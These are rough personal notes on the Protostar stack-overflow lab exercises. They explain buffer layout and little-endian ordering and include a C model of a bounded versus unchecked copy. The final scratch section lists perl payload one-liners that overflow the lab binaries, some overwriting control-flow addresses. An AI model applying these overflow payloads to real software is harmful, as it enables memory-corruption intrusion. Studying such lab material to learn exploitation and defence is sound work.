(DRAFTS I SHOULD'VE POSTED BUT DIDN'T)
====================================================================
EXERCISE 0
Goal : Modify the 'modified' variable.
====================================================================
First off, include the directory for protostar executables in your shell PATH.
In the code, notice that modified is declared (and therefore stored) before buffer. The stack grows down toward lower addresses, but a write into buffer proceeds up toward higher addresses. Because modified came first, it sits at a higher address than buffer, so input that is longer than buffer runs past its end and changes modified.
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 1
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Note the important hint that "Protostar is little endian." If you don't take that into account, the attempt fails.
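The byte-order point, as an added example that is not code from the original notes or from Protostar: it models the frame as a byte array with a 64-byte buffer followed by a 4-byte modified, and compares an unchecked copy with one bounded to the buffer. The names load_le32, modified_after_copy and run_payload are made up for this illustration, and the inputs are constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN   64             /* buffer size implied by the payloads in these notes */
#define FRAME_LEN (BUF_LEN + 4)  /* model: buffer, then a 4-byte 'modified' above it */

/* Load 4 bytes the way a little-endian CPU reads a 32-bit int. */
static uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Copy input into a zeroed model frame and return what 'modified' then holds.
   limit = FRAME_LEN models an unchecked copy (input length decides how far the
   write goes); limit = BUF_LEN models a copy bounded to the buffer. */
static uint32_t modified_after_copy(const char *input, size_t len, size_t limit)
{
    unsigned char frame[FRAME_LEN] = {0};
    if (len > limit)
        len = limit;
    memcpy(frame, input, len);
    return load_le32(frame + BUF_LEN);
}

/* Build 64 filler bytes plus 'tail' (constructed input) and run one copy. */
uint32_t run_payload(const char *tail, size_t tail_len, int bounded)
{
    char payload[FRAME_LEN];
    if (tail_len > 4)
        tail_len = 4;
    memset(payload, 'A', BUF_LEN);
    memcpy(payload + BUF_LEN, tail, tail_len);
    return modified_after_copy(payload, BUF_LEN + tail_len,
                               bounded ? BUF_LEN : FRAME_LEN);
}

int main(void)
{
    printf("65 x 'A'      -> 0x%08x\n", (unsigned)run_payload("A", 1, 0));
    printf("64 x 'A'+dcba -> 0x%08x\n", (unsigned)run_payload("dcba", 4, 0));
    printf("64 x 'A'+abcd -> 0x%08x\n", (unsigned)run_payload("abcd", 4, 0));
    printf("bounded copy  -> 0x%08x\n", (unsigned)run_payload("dcba", 4, 1));
    return 0;
}
```

The first byte written lands in the least significant byte of modified, which is why the tail has to be supplied in reverse order; with the copy limited to the buffer length, modified stays zero whatever the input.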
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 2
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Perl script
=====IMPLEMENTATION=====:
====================================================================
If you put the line:
set disassembly-flavor intel
in the file ~/.gdbinit it should work.
enable ssh server
READ THIS: http://insecure.org/stf/smashstack.html
[I SHOULD REALLY CLEAN THIS UP... EVENTUALLY....]
#0
perl -e 'print "A"x65' >attack0.sh
#1
perl -e 'print "A"x64, "dcba"'>attack1.sh
#2
set environment var with perl
get newline into buffer overflow ==> just use ' . '
#3
[picture from 4:20ish here 7/24]
perl -e 'print "a"x64 . "\x24\x84\x04\x08"' > attack3.txt
./stack3 < attack3.txt
#4
perl -e 'print "A"x76 . "\xf4\x83\x04\x08"'>attack4.txt
#5
[pic @ 5:35 7/24 here]
ON PROTOSTAR:
ip addr (get ip address )
TERMINAL ON OSX
ssh user@IPADDRESSHERE
user
bash